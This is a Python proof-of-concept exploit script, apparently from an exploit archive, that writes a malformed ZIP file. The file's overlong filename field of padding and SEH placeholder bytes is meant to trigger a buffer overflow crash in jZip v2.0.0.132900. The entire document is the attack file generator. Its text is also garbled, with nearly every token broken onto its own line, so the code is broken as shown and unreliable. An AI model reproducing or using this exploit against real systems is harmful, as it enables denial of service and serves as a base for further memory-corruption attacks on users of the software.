#!/usr/bin/python
######################################################
# Exploit title: seh unicode buffer overflow (DOS)
# Date: 16/04/2014
# Exploit Author: motaz reda [motazkhodair[at]gmail.com]
# Software Link : http://www.jzip.com/
# Version: jZip v2.0.0.132900
# Tested On: Windows 7 ultimate
########################################################
import
sys, os
filename
=
"vuln.zip"
buffer
=
"\x50\x4B\x03\x04\x14\x00\x00"
buffer
+
=
"\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00"
buffer
+
=
"\x00\x00\x00\x00\x00\x00\x00\x00"
buffer
+
=
"\xe4\x0f"
buffer
+
=
"\x00\x00\x00"
eo
=
"\x50\x4B\x05\x06\x00\x00\x00\x00\x01\x00\x01\x00"
eo
+
=
"\x12\x10\x00\x00"
eo
+
=
"\x02\x10\x00\x00"
eo
+
=
"\x00\x00"
cdf
=
"\x50\x4B\x01\x02\x14\x00\x14"
cdf
+
=
"\x00\x00\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00"
cdf
+
=
"\x00\x00\x00\x00\x00\x00\x00\x00\x00"
cdf
+
=
"\xe4\x0f"
cdf
+
=
"\x00\x00\x00\x00\x00\x00\x01\x00"
cdf
+
=
"\x24\x00\x00\x00\x00\x00\x00\x00"
payload
=
"A"
*
862
payload
+
=
"\x42\x42"
# NSEH
payload
+
=
"\x42\x42"
# SEH
payload
+
=
"D"
*
3198
payload
+
=
".txt"
file
=
open
(filename,
"w"
)
zipfile
=
buffer
+
payload
+
cdf
+
payload
+
eo
file
.write(zipfile)
file
.close()